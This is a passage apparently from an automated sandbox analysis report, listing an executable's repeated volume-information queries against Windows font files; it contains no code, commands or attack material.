          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
